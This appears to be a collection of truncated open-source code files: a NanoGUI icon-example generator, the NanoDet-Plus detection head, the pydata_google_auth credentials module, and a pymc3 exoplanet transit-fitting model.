IconBox(Widget *parent, const std::string &name, int icon, int width)
: Widget(parent) {{
this->setLayout(new BoxLayout(Orientation::Horizontal));
auto *b = new Button(this, "", icon);
b->setFixedWidth(40);
auto *text = new TextBox(this, name);
text->setDefaultValue(name);
text->setEditable(true);
/* Return false essentially makes it not possible to actually edit this text
* box, but keeping it editable=true allows selection for copy-paste. If the
* text box is not editable, then the user cannot highlight it.
*/
text->setCallback([](const std::string &) {{ return false; }});
text->setFont("mono-bold");
text->setFixedWidth(width - 40);
}}
}};
int main(int /* argc */, char ** /* argv */) {{
nanogui::init();
/* scoped variables */ {{
static constexpr int width = 1000;
static constexpr int half_width = width / 2;
static constexpr int height = 800;
// create a fixed size screen with one window
{Name}Screen *screen = new {Name}Screen({{width, height}}, "NanoGUI {Name} Icons", false);
// create the custom theme now so that all children will inherit it
Window *window = new Window(screen, "");
window->setPosition({{0, 0}});
window->setFixedSize({{width, height}});
// attach a vertical scroll panel
auto vscroll = new VScrollPanel(window);
vscroll->setFixedSize({{width, height}});
// vscroll should only have *ONE* child. this is what `wrapper` is for
auto wrapper = new Widget(vscroll);
wrapper->setFixedSize({{width, height}});
wrapper->setLayout(new GridLayout());// defaults: 2 columns
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
'''.format(
name=FONT_NAME,
Name=FONT_NAME.capitalize()
)).lstrip())
for icon_name, icon_def, icon_code in cdefs:
# icon_def is `#define FONTNAME_ICON_X`
cpp_def = icon_def.split(" ")[1]
cpp_example.write(" ADD_ICON(wrapper, {cpp_def}, half_width);\n".format(cpp_def=cpp_def))
# close out the cpp example
cpp_example.write(textwrap.dedent('''
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
screen->performLayout();
screen->setVisible(true);
nanogui::mainloop();
}
nanogui::shutdown();
return 0;
}
''').replace("\n", "", 1))
cpp_example.close()
# <3 python
py_example_path = "{containment}/example_{name}.py".format(
containment=containment, name=FONT_NAME
)
with open(py_example_path, "w") as py_example:
py_example.write(textwrap.dedent('''
# Developer note: need to make a change to this file?
# Please raise an Issue on GitHub describing what needs to change. This file
# was generated, so the scripts that generated it need to update as well.
import gc
import nanogui
from nanogui import Screen, Window, Widget, GridLayout, VScrollPanel, Button, TextBox, BoxLayout, Orientation, Theme
from nanogui import {name}
class {Name}Theme(nanogui.Theme):
# This override informs NanoGUI to use this as the icon font.
def defaultIconFont(self):
return "{name}"
def __init__(self, ctx):
super({Name}Theme, self).__init__(ctx)
self.m{Name}Font = nanogui.createFontMem(ctx, "{name}", "{name}.ttf")
if self.m{Name}Font == -1:
raise RuntimeError("Could | |
<reponame>automaton123456/nanodet
import math
import cv2
import numpy as np
import torch
import torch.nn as nn
from nanodet.util import bbox2distance, distance2bbox, multi_apply, overlay_bbox_cv
from ...data.transform.warp import warp_boxes
from ..loss.gfocal_loss import DistributionFocalLoss, QualityFocalLoss
from ..loss.iou_loss import GIoULoss
from ..module.conv import ConvModule, DepthwiseConvModule
from ..module.init_weights import normal_init
from ..module.nms import multiclass_nms
from .assigner.dsl_assigner import DynamicSoftLabelAssigner
from .gfl_head import Integral, reduce_mean
class NanoDetPlusHead(nn.Module):
"""Detection head used in NanoDet-Plus.
Args:
num_classes (int): Number of categories excluding the background
category.
loss (dict): Loss config.
input_channel (int): Number of channels of the input feature.
feat_channels (int): Number of channels of the feature.
Default: 96.
stacked_convs (int): Number of conv layers in the stacked convs.
Default: 2.
kernel_size (int): Size of the convolving kernel. Default: 5.
strides (list[int]): Strides of input multi-level feature maps.
Default: [8, 16, 32].
conv_type (str): Type of the convolution.
Default: "DWConv".
norm_cfg (dict): Dictionary to construct and config norm layer.
Default: dict(type='BN').
reg_max (int): The maximal value of the discrete set. Default: 7.
activation (str): Type of activation function. Default: "LeakyReLU".
assigner_cfg (dict): Config dict of the assigner. Default: dict(topk=13).
"""
def __init__(
self,
num_classes,
loss,
input_channel,
feat_channels=96,
stacked_convs=2,
kernel_size=5,
strides=[8, 16, 32],
conv_type="DWConv",
norm_cfg=dict(type="BN"),
reg_max=7,
activation="LeakyReLU",
assigner_cfg=dict(topk=13),
**kwargs
):
super(NanoDetPlusHead, self).__init__()
self.num_classes = num_classes
self.in_channels = input_channel
self.feat_channels = feat_channels
self.stacked_convs = stacked_convs
self.kernel_size = kernel_size
self.strides = strides
self.reg_max = reg_max
self.activation = activation
self.ConvModule = ConvModule if conv_type == "Conv" else DepthwiseConvModule
self.loss_cfg = loss
self.norm_cfg = norm_cfg
self.assigner = DynamicSoftLabelAssigner(**assigner_cfg)
self.distribution_project = Integral(self.reg_max)
self.loss_qfl = QualityFocalLoss(
beta=self.loss_cfg.loss_qfl.beta,
loss_weight=self.loss_cfg.loss_qfl.loss_weight,
)
self.loss_dfl = DistributionFocalLoss(
loss_weight=self.loss_cfg.loss_dfl.loss_weight
)
self.loss_bbox = GIoULoss(loss_weight=self.loss_cfg.loss_bbox.loss_weight)
self._init_layers()
self.init_weights()
def _init_layers(self):
self.cls_convs = nn.ModuleList()
for _ in self.strides:
cls_convs = self._buid_not_shared_head()
self.cls_convs.append(cls_convs)
self.gfl_cls = nn.ModuleList(
[
nn.Conv2d(
self.feat_channels,
self.num_classes + 4 * (self.reg_max + 1),
1,
padding=0,
)
for _ in self.strides
]
)
def _buid_not_shared_head(self):
cls_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.feat_channels
cls_convs.append(
self.ConvModule(
chn,
self.feat_channels,
self.kernel_size,
stride=1,
padding=self.kernel_size // 2,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None,
activation=self.activation,
)
)
return cls_convs
def init_weights(self):
for m in self.cls_convs.modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.01)
# init cls head with confidence = 0.01
bias_cls = -4.595
for i in range(len(self.strides)):
normal_init(self.gfl_cls[i], std=0.01, bias=bias_cls)
print("Finish initialize NanoDet-Plus Head.")
def forward(self, feats):
if torch.onnx.is_in_onnx_export():
return self._forward_onnx(feats)
outputs = []
for feat, cls_convs, gfl_cls in zip(
feats,
self.cls_convs,
self.gfl_cls,
):
for conv in cls_convs:
feat = conv(feat)
output = gfl_cls(feat)
outputs.append(output.flatten(start_dim=2))
outputs = torch.cat(outputs, dim=2).permute(0, 2, 1)
return outputs
def loss(self, preds, gt_meta, aux_preds=None):
"""Compute losses.
Args:
preds (Tensor): Prediction output.
gt_meta (dict): Ground truth information.
aux_preds (tuple[Tensor], optional): Auxiliary head prediction output.
Returns:
loss (Tensor): Loss tensor.
loss_states (dict): State dict of each loss.
"""
gt_bboxes = gt_meta["gt_bboxes"]
gt_labels = gt_meta["gt_labels"]
device = preds.device
batch_size = preds.shape[0]
input_height, input_width = gt_meta["img"].shape[2:]
featmap_sizes = [
(math.ceil(input_height / stride), math.ceil(input_width) / stride)
for stride in self.strides
]
# get grid cells of one image
mlvl_center_priors = [
self.get_single_level_center_priors(
batch_size,
featmap_sizes[i],
stride,
dtype=torch.float32,
device=device,
)
for i, stride in enumerate(self.strides)
]
center_priors = torch.cat(mlvl_center_priors, dim=1)
cls_preds, reg_preds = preds.split(
[self.num_classes, 4 * (self.reg_max + 1)], dim=-1
)
dis_preds = self.distribution_project(reg_preds) * center_priors[..., 2, None]
decoded_bboxes = distance2bbox(center_priors[..., :2], dis_preds)
if aux_preds is not None:
# use auxiliary head to assign
aux_cls_preds, aux_reg_preds = aux_preds.split(
[self.num_classes, 4 * (self.reg_max + 1)], dim=-1
)
aux_dis_preds = (
self.distribution_project(aux_reg_preds) * center_priors[..., 2, None]
)
aux_decoded_bboxes = distance2bbox(center_priors[..., :2], aux_dis_preds)
batch_assign_res = multi_apply(
self.target_assign_single_img,
aux_cls_preds.detach(),
center_priors,
aux_decoded_bboxes.detach(),
gt_bboxes,
gt_labels,
)
else:
# use self prediction to assign
batch_assign_res = multi_apply(
self.target_assign_single_img,
cls_preds.detach(),
center_priors,
decoded_bboxes.detach(),
gt_bboxes,
gt_labels,
)
loss, loss_states = self._get_loss_from_assign(
cls_preds, reg_preds, decoded_bboxes, batch_assign_res
)
if aux_preds is not None:
aux_loss, aux_loss_states = self._get_loss_from_assign(
aux_cls_preds, aux_reg_preds, aux_decoded_bboxes, batch_assign_res
)
loss = loss + aux_loss
for k, v in aux_loss_states.items():
loss_states["aux_" + k] = v
return loss, loss_states
def _get_loss_from_assign(self, cls_preds, reg_preds, decoded_bboxes, assign):
device = cls_preds.device
labels, label_scores, bbox_targets, dist_targets, num_pos = assign
num_total_samples = max(
reduce_mean(torch.tensor(sum(num_pos)).to(device)).item(), 1.0
)
labels = torch.cat(labels, dim=0)
label_scores = torch.cat(label_scores, dim=0)
bbox_targets = torch.cat(bbox_targets, dim=0)
cls_preds = cls_preds.reshape(-1, self.num_classes)
reg_preds = reg_preds.reshape(-1, 4 * (self.reg_max + 1))
decoded_bboxes = decoded_bboxes.reshape(-1, 4)
loss_qfl = self.loss_qfl(
cls_preds, (labels, label_scores), avg_factor=num_total_samples
)
pos_inds = torch.nonzero(
(labels >= 0) & (labels < self.num_classes), as_tuple=False
).squeeze(1)
if len(pos_inds) > 0:
weight_targets = cls_preds[pos_inds].detach().sigmoid().max(dim=1)[0]
bbox_avg_factor = max(reduce_mean(weight_targets.sum()).item(), 1.0)
loss_bbox = self.loss_bbox(
decoded_bboxes[pos_inds],
bbox_targets[pos_inds],
weight=weight_targets,
avg_factor=bbox_avg_factor,
)
dist_targets = torch.cat(dist_targets, dim=0)
loss_dfl = self.loss_dfl(
reg_preds[pos_inds].reshape(-1, self.reg_max + 1),
dist_targets[pos_inds].reshape(-1),
weight=weight_targets[:, None].expand(-1, 4).reshape(-1),
avg_factor=4.0 * bbox_avg_factor,
)
else:
loss_bbox = reg_preds.sum() * 0
loss_dfl = reg_preds.sum() * 0
loss = loss_qfl + loss_bbox + loss_dfl
loss_states = dict(loss_qfl=loss_qfl, loss_bbox=loss_bbox, loss_dfl=loss_dfl)
return loss, loss_states
@torch.no_grad()
def target_assign_single_img(
self, cls_preds, center_priors, decoded_bboxes, gt_bboxes, gt_labels
):
"""Compute classification, regression, and objectness targets for
priors in a single image.
Args:
cls_preds (Tensor): Classification predictions of one image,
a 2D-Tensor with shape [num_priors, num_classes]
center_priors (Tensor): All priors of one image, a 2D-Tensor with
shape [num_priors, 4] in [cx, xy, stride_w, stride_y] format.
decoded_bboxes (Tensor): Decoded bboxes predictions of one image,
a 2D-Tensor with shape [num_priors, 4] in [tl_x, tl_y,
br_x, br_y] format.
gt_bboxes (Tensor): Ground truth bboxes of one image, a 2D-Tensor
with shape [num_gts, 4] in [tl_x, tl_y, br_x, br_y] format.
gt_labels (Tensor): Ground truth labels of one image, a Tensor
with shape [num_gts].
"""
num_priors = center_priors.size(0)
device = center_priors.device
gt_bboxes = torch.from_numpy(gt_bboxes).to(device)
gt_labels = torch.from_numpy(gt_labels).to(device)
num_gts = gt_labels.size(0)
gt_bboxes = gt_bboxes.to(decoded_bboxes.dtype)
bbox_targets = torch.zeros_like(center_priors)
dist_targets = torch.zeros_like(center_priors)
labels = center_priors.new_full(
(num_priors,), self.num_classes, dtype=torch.long
)
label_scores = center_priors.new_zeros(labels.shape, dtype=torch.float)
# No target
if num_gts == 0:
return labels, label_scores, bbox_targets, dist_targets, 0
assign_result = self.assigner.assign(
cls_preds.sigmoid(), center_priors, decoded_bboxes, gt_bboxes, gt_labels
)
pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds = self.sample(
assign_result, gt_bboxes
)
num_pos_per_img = pos_inds.size(0)
pos_ious = assign_result.max_overlaps[pos_inds]
if len(pos_inds) > 0:
bbox_targets[pos_inds, :] = pos_gt_bboxes
dist_targets[pos_inds, :] = (
bbox2distance(center_priors[pos_inds, :2], pos_gt_bboxes)
/ center_priors[pos_inds, None, 2]
)
dist_targets = dist_targets.clamp(min=0, max=self.reg_max - 0.1)
labels[pos_inds] = gt_labels[pos_assigned_gt_inds]
label_scores[pos_inds] = pos_ious
return (
labels,
label_scores,
bbox_targets,
dist_targets,
num_pos_per_img,
)
def sample(self, assign_result, gt_bboxes):
"""Sample positive and negative bboxes."""
pos_inds = (
torch.nonzero(assign_result.gt_inds > 0, as_tuple=False)
.squeeze(-1)
.unique()
)
neg_inds = (
torch.nonzero(assign_result.gt_inds == 0, as_tuple=False)
.squeeze(-1)
.unique()
)
pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1
if gt_bboxes.numel() == 0:
# hack for index error case
assert pos_assigned_gt_inds.numel() == 0
pos_gt_bboxes = torch.empty_like(gt_bboxes).view(-1, 4)
else:
if len(gt_bboxes.shape) < 2:
gt_bboxes = gt_bboxes.view(-1, 4)
pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds, :]
return pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds
def post_process(self, preds, meta):
"""Prediction results post processing. Decode bboxes and rescale
to original image size.
Args:
preds (Tensor): Prediction output.
meta (dict): Meta info.
"""
cls_scores, bbox_preds = preds.split(
[self.num_classes, 4 * (self.reg_max + 1)], dim=-1
)
result_list = self.get_bboxes(cls_scores, bbox_preds, meta)
det_results = {}
warp_matrixes = (
meta["warp_matrix"]
if isinstance(meta["warp_matrix"], list)
else meta["warp_matrix"]
)
img_heights = (
meta["img_info"]["height"].cpu().numpy()
if isinstance(meta["img_info"]["height"], torch.Tensor)
else meta["img_info"]["height"]
)
img_widths = (
meta["img_info"]["width"].cpu().numpy()
if isinstance(meta["img_info"]["width"], torch.Tensor)
else meta["img_info"]["width"]
)
img_ids = (
meta["img_info"]["id"].cpu().numpy()
if isinstance(meta["img_info"]["id"], torch.Tensor)
else meta["img_info"]["id"]
)
for result, img_width, img_height, img_id, warp_matrix in zip(
result_list, img_widths, img_heights, img_ids, warp_matrixes
):
det_result = {}
det_bboxes, det_labels = result
det_bboxes = det_bboxes.detach().cpu().numpy()
det_bboxes[:, :4] = warp_boxes(
det_bboxes[:, :4], np.linalg.inv(warp_matrix), img_width, img_height
)
classes = det_labels.detach().cpu().numpy()
for i in range(self.num_classes):
inds = classes == i
det_result[i] = np.concatenate(
[
det_bboxes[inds, :4].astype(np.float32),
det_bboxes[inds, 4:5].astype(np.float32),
],
axis=1,
).tolist()
det_results[img_id] = det_result
return det_results
def show_result(
self, img, dets, class_names, score_thres=0.3, show=True, save_path=None
):
result = overlay_bbox_cv(img, dets, class_names, score_thresh=score_thres)
if show:
cv2.imshow("det", result)
return result
def get_bboxes(self, cls_preds, reg_preds, img_metas):
"""Decode the outputs to bboxes.
Args:
cls_preds (Tensor): Shape (num_imgs, num_points, num_classes).
reg_preds (Tensor): Shape (num_imgs, num_points, 4 * (regmax + 1)).
img_metas (dict): Dict of image info.
Returns:
results_list (list[tuple]): List of detection bboxes and labels.
"""
device = cls_preds.device
b = cls_preds.shape[0]
input_height, input_width = img_metas["img"].shape[2:]
input_shape = (input_height, input_width)
featmap_sizes = [
(math.ceil(input_height / stride), math.ceil(input_width) / stride)
for stride in self.strides
]
# get grid | |
"""Private module for fetching Google API credentials."""
import logging
import google.auth
import google.auth.exceptions
import google.oauth2.credentials
from google_auth_oauthlib import flow
import oauthlib.oauth2.rfc6749.errors
import google.auth.transport.requests
from pydata_google_auth import exceptions
from pydata_google_auth import cache
from pydata_google_auth import _webserver
logger = logging.getLogger(__name__)
CLIENT_ID = "262006177488-3425ks60hkk80fssi9vpohv88g6q1iqd.apps.googleusercontent.com"
CLIENT_SECRET = "<KEY>"
GOOGLE_AUTH_URI = "https://accounts.google.com/o/oauth2/auth"
GOOGLE_TOKEN_URI = "https://oauth2.googleapis.com/token"
def default(
scopes,
client_id=None,
client_secret=None,
credentials_cache=cache.READ_WRITE,
use_local_webserver=False,
auth_local_webserver=None,
):
"""
Get credentials and default project for accessing Google APIs.
This method first attempts to get credentials via the
:func:`google.auth.default` function. If it is unable to get valid
credentials, it then attempts to get user account credentials via the
:func:`pydata_google_auth.get_user_credentials` function.
Parameters
----------
scopes : list[str]
A list of scopes to use when authenticating to Google APIs. See the
`list of OAuth 2.0 scopes for Google APIs
<https://developers.google.com/identity/protocols/googlescopes>`_.
client_id : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client ID associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client ID associated with your project. Per the `Google
APIs terms of service <https://developers.google.com/terms/>`_, you
must not mask your API client's identity when using Google APIs.
client_secret : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client secret associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client secret associated with your project. Per the
`Google APIs terms of service
<https://developers.google.com/terms/>`_, you must not mask your API
client's identity when using Google APIs.
credentials_cache : pydata_google_auth.cache.CredentialsCache, optional
An object responsible for loading and saving user credentials.
By default, pydata-google-auth reads and writes credentials in
``$HOME/.config/pydata/pydata_google_credentials.json`` or
``$APPDATA/.config/pydata/pydata_google_credentials.json`` on
Windows.
use_local_webserver : bool, optional
Use a local webserver for the user authentication
:class:`google_auth_oauthlib.flow.InstalledAppFlow`. Binds a
webserver to an open port on ``localhost`` between 8080 and 8089,
inclusive, to receive authentication token. If not set, defaults to
``False``, which requests a token via the console.
auth_local_webserver : deprecated
Use the ``use_local_webserver`` parameter instead.
Returns
-------
credentials, project_id : tuple[google.auth.credentials.Credentials, str or None]
credentials : OAuth 2.0 credentials for accessing Google APIs
project_id : A default Google developer project ID, if one could be determined
from the credentials. For example, this returns the project ID
associated with a service account when using a service account key
file. It returns None when using user-based credentials.
Raises
------
pydata_google_auth.exceptions.PyDataCredentialsError
If unable to get valid credentials.
"""
if auth_local_webserver is not None:
use_local_webserver = auth_local_webserver
# Try to retrieve Application Default Credentials
credentials, default_project = get_application_default_credentials(scopes)
if credentials and credentials.valid:
return credentials, default_project
credentials = get_user_credentials(
scopes,
client_id=client_id,
client_secret=client_secret,
credentials_cache=credentials_cache,
use_local_webserver=use_local_webserver,
)
if not credentials or not credentials.valid:
raise exceptions.PyDataCredentialsError("Could not get any valid credentials.")
return credentials, None
def get_application_default_credentials(scopes):
"""
This method tries to retrieve the "default application credentials".
This could be useful for running code on Google Cloud Platform.
Parameters
----------
project_id (str, optional): Override the default project ID.
Returns
-------
- GoogleCredentials,
If the default application credentials can be retrieved
from the environment. The retrieved credentials should also
have access to the project (project_id) on BigQuery.
- OR None,
If default application credentials can not be retrieved
from the environment. Or, the retrieved credentials do not
have access to the project (project_id) on BigQuery.
"""
try:
credentials, project = google.auth.default(scopes=scopes)
except (google.auth.exceptions.DefaultCredentialsError, IOError) as exc:
logger.debug("Error getting default credentials: {}".format(str(exc)))
return None, None
if credentials and not credentials.valid:
request = google.auth.transport.requests.Request()
try:
credentials.refresh(request)
except google.auth.exceptions.RefreshError:
# Sometimes (such as on Travis) google-auth returns GCE
# credentials, but fetching the token for those credentials doesn't
# actually work. See:
# https://github.com/googleapis/google-auth-library-python/issues/287
return None, None
return credentials, project
def get_user_credentials(
scopes,
client_id=None,
client_secret=None,
credentials_cache=cache.READ_WRITE,
use_local_webserver=False,
auth_local_webserver=None,
):
"""
Gets user account credentials.
This function authenticates using user credentials, either loading saved
credentials from the cache or by going through the OAuth 2.0 flow.
The default read-write cache attempts to read credentials from a file on
disk. If these credentials are not found or are invalid, it begins an
OAuth 2.0 flow to get credentials. You'll open a browser window asking
for you to authenticate to your Google account using the product name
``PyData Google Auth``. The permissions it requests correspond to the
scopes you've provided.
Additional information on the user credentails authentication mechanism
can be found `here
<https://developers.google.com/identity/protocols/OAuth2#clientside/>`__.
Parameters
----------
scopes : list[str]
A list of scopes to use when authenticating to Google APIs. See the
`list of OAuth 2.0 scopes for Google APIs
<https://developers.google.com/identity/protocols/googlescopes>`_.
client_id : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client ID associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client ID associated with your project. Per the `Google
APIs terms of service <https://developers.google.com/terms/>`_, you
must not mask your API client's identity when using Google APIs.
client_secret : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client secret associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client secret associated with your project. Per the
`Google APIs terms of service
<https://developers.google.com/terms/>`_, you must not mask your API
client's identity when using Google APIs.
credentials_cache : pydata_google_auth.cache.CredentialsCache, optional
An object responsible for loading and saving user credentials.
By default, pydata-google-auth reads and writes credentials in
``$HOME/.config/pydata/pydata_google_credentials.json`` or
``$APPDATA/.config/pydata/pydata_google_credentials.json`` on
Windows.
use_local_webserver : bool, optional
Use a local webserver for the user authentication
:class:`google_auth_oauthlib.flow.InstalledAppFlow`. Binds a
webserver to an open port on ``localhost`` between 8080 and 8089,
inclusive, to receive authentication token. If not set, defaults to
``False``, which requests a token via the console.
auth_local_webserver : deprecated
Use the ``use_local_webserver`` parameter instead.
Returns
-------
credentials : google.oauth2.credentials.Credentials
Credentials for the user, with the requested scopes.
Raises
------
pydata_google_auth.exceptions.PyDataCredentialsError
If unable to get valid user credentials.
"""
if auth_local_webserver is not None:
use_local_webserver = auth_local_webserver
# Use None as default for client_id and client_secret so that the values
# aren't included in the docs. A string of bytes isn't useful for the
# documentation and might encourage the values to be used outside of this
# library.
if client_id is None:
client_id = CLIENT_ID
if client_secret is None:
client_secret = CLIENT_SECRET
credentials = credentials_cache.load()
client_config = {
"installed": {
"client_id": client_id,
"client_secret": client_secret,
"redirect_uris": ["urn:ietf:wg:oauth:2.0:oob"],
"auth_uri": GOOGLE_AUTH_URI,
"token_uri": GOOGLE_TOKEN_URI,
}
}
if credentials is None:
app_flow = flow.InstalledAppFlow.from_client_config(
client_config, scopes=scopes
)
try:
if use_local_webserver:
credentials = _webserver.run_local_server(app_flow)
else:
credentials = app_flow.run_console()
except oauthlib.oauth2.rfc6749.errors.OAuth2Error as exc:
raise exceptions.PyDataCredentialsError(
"Unable to get valid credentials: {}".format(exc)
)
credentials_cache.save(credentials)
if credentials and not credentials.valid:
request = google.auth.transport.requests.Request()
credentials.refresh(request)
return credentials
def save_user_credentials(
scopes, path, client_id=None, client_secret=None, use_local_webserver=False
):
"""
Gets user account credentials and saves them to a JSON file at ``path``.
This function authenticates using user credentials by going through the
OAuth 2.0 flow.
Parameters
----------
scopes : list[str]
A list of scopes to use when authenticating to Google APIs. See the
`list of OAuth 2.0 scopes for Google APIs
<https://developers.google.com/identity/protocols/googlescopes>`_.
path : str
Path to save credentials JSON file.
client_id : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client ID associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client ID associated with your project. Per the `Google
APIs terms of service <https://developers.google.com/terms/>`_, you
must not mask your API client's identity when using Google APIs.
client_secret : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client secret associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client secret associated with your project. Per the
`Google APIs terms of service
<https://developers.google.com/terms/>`_, you must not mask your API
client's identity when using Google APIs.
use_local_webserver : | |
"""
The guts are in:
run_transit_inference
run_onetransit_inference
run_alltransit_inference
run_allindivtransit_inference
"""
import numpy as np, matplotlib.pyplot as plt, pandas as pd, pymc3 as pm
import pickle, os
from astropy import units as units, constants as const
from numpy import array as nparr
from functools import partial
from collections import OrderedDict
import exoplanet as xo
from exoplanet.gp import terms, GP
import theano.tensor as tt
from timmy.plotting import plot_MAP_data as plot_MAP_phot
from timmy.plotting import plot_MAP_rv
from timmy.paths import RESULTSDIR
from timmy.priors import RSTAR, RSTAR_STDEV, LOGG, LOGG_STDEV
# factor * 10**logg / r_star = rho
factor = 5.141596357654149e-05
class ModelParser:
def __init__(self, modelid):
self.initialize_model(modelid)
def initialize_model(self, modelid):
self.modelid = modelid
self.modelcomponents = modelid.split('_')
self.verify_modelcomponents()
def verify_modelcomponents(self):
validcomponents = ['transit', 'gprot', 'rv', 'alltransit', 'quad',
'quaddepthvar', 'onetransit', 'allindivtransit',
'tessindivtransit', 'oddindivtransit',
'evenindivtransit']
for i in range(5):
validcomponents.append('{}sincosPorb'.format(i))
validcomponents.append('{}sincosProt'.format(i))
assert len(self.modelcomponents) >= 1
for modelcomponent in self.modelcomponents:
if modelcomponent not in validcomponents:
errmsg = (
'Got modelcomponent {}. validcomponents include {}.'
.format(modelcomponent, validcomponents)
)
raise ValueError(errmsg)
class ModelFitter(ModelParser):
"""
Given a modelid of the form "transit", or "rv" and a dataframe containing
(time and flux), or (time and rv), run the inference.
"""
def __init__(self, modelid, data_df, prior_d, N_samples=2000, N_cores=16,
target_accept=0.8, N_chains=4, plotdir=None, pklpath=None,
overwrite=1, rvdf=None):
self.N_samples = N_samples
self.N_cores = N_cores
self.N_chains = N_chains
self.PLOTDIR = plotdir
self.OVERWRITE = overwrite
if 'transit' == modelid:
self.data = data_df
self.x_obs = nparr(data_df['x_obs'])
self.y_obs = nparr(data_df['y_obs'])
self.y_err = nparr(data_df['y_err'])
self.t_exp = np.nanmedian(np.diff(self.x_obs))
if modelid in ['alltransit', 'alltransit_quad',
'alltransit_quaddepthvar', 'onetransit',
'allindivtransit', 'tessindivtransit',
'oddindivtransit', 'evenindivtransit']:
assert isinstance(data_df, OrderedDict)
self.data = data_df
if 'rv' in modelid:
raise NotImplementedError
self.initialize_model(modelid)
if modelid not in ['alltransit', 'alltransit_quad',
'alltransit_quaddepthvar', 'onetransit',
'allindivtransit', 'tessindivtransit',
'oddindivtransit', 'evenindivtransit']:
self.verify_inputdata()
#NOTE threadsafety needn't be hardcoded
make_threadsafe = False
if modelid == 'transit':
self.run_transit_inference(
prior_d, pklpath, make_threadsafe=make_threadsafe
)
elif modelid == 'onetransit':
self.run_onetransit_inference(
prior_d, pklpath, make_threadsafe=make_threadsafe
)
elif modelid == 'rv':
self.run_rv_inference(
prior_d, pklpath, make_threadsafe=make_threadsafe
)
elif modelid in ['alltransit', 'alltransit_quad',
'alltransit_quaddepthvar']:
self.run_alltransit_inference(
prior_d, pklpath, make_threadsafe=make_threadsafe
)
elif modelid in ['allindivtransit', 'tessindivtransit',
'oddindivtransit', 'evenindivtransit']:
self.run_allindivtransit_inference(
prior_d, pklpath, make_threadsafe=make_threadsafe,
target_accept=target_accept
)
def verify_inputdata(self):
np.testing.assert_array_equal(
self.x_obs,
self.x_obs[np.argsort(self.x_obs)]
)
assert len(self.x_obs) == len(self.y_obs)
assert isinstance(self.x_obs, np.ndarray)
assert isinstance(self.y_obs, np.ndarray)
def run_transit_inference(self, prior_d, pklpath, make_threadsafe=True):
# if the model has already been run, pull the result from the
# pickle. otherwise, run it.
if os.path.exists(pklpath):
d = pickle.load(open(pklpath, 'rb'))
self.model = d['model']
self.trace = d['trace']
self.map_estimate = d['map_estimate']
return 1
with pm.Model() as model:
# Fixed data errors.
sigma = self.y_err
# Define priors and PyMC3 random variables to sample over.
# Stellar parameters. (Following tess.world notebooks).
logg_star = pm.Normal("logg_star", mu=LOGG, sd=LOGG_STDEV)
r_star = pm.Bound(pm.Normal, lower=0.0)(
"r_star", mu=RSTAR, sd=RSTAR_STDEV
)
rho_star = pm.Deterministic(
"rho_star", factor*10**logg_star / r_star
)
# Transit parameters.
mean = pm.Normal(
"mean", mu=prior_d['mean'], sd=1e-2, testval=prior_d['mean']
)
t0 = pm.Normal(
"t0", mu=prior_d['t0'], sd=2e-3, testval=prior_d['t0']
)
period = pm.Normal(
'period', mu=prior_d['period'], sd=5e-4,
testval=prior_d['period']
)
# NOTE: might want to implement kwarg for flexibility
# u = xo.distributions.QuadLimbDark(
# "u", testval=prior_d['u']
# )
u0 = pm.Uniform(
'u[0]', lower=prior_d['u[0]']-0.15,
upper=prior_d['u[0]']+0.15,
testval=prior_d['u[0]']
)
u1 = pm.Uniform(
'u[1]', lower=prior_d['u[1]']-0.15,
upper=prior_d['u[1]']+0.15,
testval=prior_d['u[1]']
)
u = [u0, u1]
# # The Espinoza (2018) parameterization for the joint radius ratio and
# # impact parameter distribution
# r, b = xo.distributions.get_joint_radius_impact(
# min_radius=0.001, max_radius=1.0,
# testval_r=prior_d['r'],
# testval_b=prior_d['b']
# )
# # NOTE: apparently, it's been deprecated. DFM's manuscript notes
# that it leads to Rp/Rs values biased high
log_r = pm.Uniform('log_r', lower=np.log(1e-2), upper=np.log(1),
testval=prior_d['log_r'])
r = pm.Deterministic('r', tt.exp(log_r))
b = xo.distributions.ImpactParameter(
"b", ror=r, testval=prior_d['b']
)
orbit = xo.orbits.KeplerianOrbit(
period=period, t0=t0, b=b, rho_star=rho_star, r_star=r_star
)
mu_transit = pm.Deterministic(
'mu_transit',
xo.LimbDarkLightCurve(u).get_light_curve(
orbit=orbit, r=r, t=self.x_obs, texp=self.t_exp
).T.flatten()
)
#
# Derived parameters
#
# planet radius in jupiter radii
r_planet = pm.Deterministic(
"r_planet", (r*r_star)*( 1*units.Rsun/(1*units.Rjup) ).cgs.value
)
#
# eq 30 of winn+2010, ignoring planet density.
#
a_Rs = pm.Deterministic(
"a_Rs",
(rho_star * period**2)**(1/3)
*
(( (1*units.gram/(1*units.cm)**3) * (1*units.day**2)
* const.G / (3*np.pi)
)**(1/3)).cgs.value
)
#
# cosi. assumes e=0 (e.g., Winn+2010 eq 7)
#
cosi = pm.Deterministic("cosi", b / a_Rs)
# probably safer than tt.arccos(cosi)
sini = pm.Deterministic("sini", pm.math.sqrt( 1 - cosi**2 ))
#
# transit durations (T_14, T_13) for circular orbits. Winn+2010 Eq 14, 15.
# units: hours.
#
T_14 = pm.Deterministic(
'T_14',
(period/np.pi)*
tt.arcsin(
(1/a_Rs) * pm.math.sqrt( (1+r)**2 - b**2 )
* (1/sini)
)*24
)
T_13 = pm.Deterministic(
'T_13',
(period/np.pi)*
tt.arcsin(
